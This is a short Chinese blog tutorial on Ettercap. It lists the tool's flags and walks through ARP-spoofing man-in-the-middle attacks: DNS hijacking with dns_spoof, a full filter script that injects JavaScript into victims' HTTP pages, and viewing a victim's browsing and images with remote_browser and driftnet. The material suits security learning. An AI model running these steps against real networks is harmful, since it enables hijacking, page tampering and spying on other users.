Ettercap

Ettercap的使用

常用指令

指令 说明
-T 使用只显示字符
-q 安静模式,不显示抓到数据包的内容
gt > 大于
-G 图形化启动
-i 使用网络接口
-l 显示所有的网络接口
-P 设置插件
-F 加载过滤器
-w 将嗅探到的数据写入到pcap文件中量
-L 此处计量所有流
-M 执行Mitm攻击

案例

DNS劫持

  1. ettercap -G
  2. 选择网络接口

  1. 扫描IP,打开IP列表

  1. 添加网关和攻击IP

  1. 在Mitm中选择arp攻击方式,勾选第一个选项

  1. 在Plugins中选择自带的插件dns_spoof

  1. 修改etter.dns配置文件
cd /etc/ettercap/etter.dns
leafpad etter.dns

  1. 开始攻击

访问网站弹框

  1. 1-7和上面的一样
  2. 找到可以让网站弹框脚本,保存为.filter文件
// 弹框脚本
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        pcre_regex(DATA.data, "(Accept-Encoding:).*([\r\n])", "$1 identity$2");
        msg("change encoding");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<head><script>alert('js inject')</script>");
        msg("inject head");
    }
}

  1. 编译filter文件为ef文件

  1. 在Filters中选择导入编译好的ef文件

  1. 开始攻击

查看对方浏览器

  1. 1-7相同
  2. 在Plugins中选择自带的插件remote_browser

  1. 开始攻击
  2. 如果想查看网站的图片
driftnet -i eth0

posted @ 2022-07-12 18:02  余星酒  阅读(156)  评论(0)    收藏  举报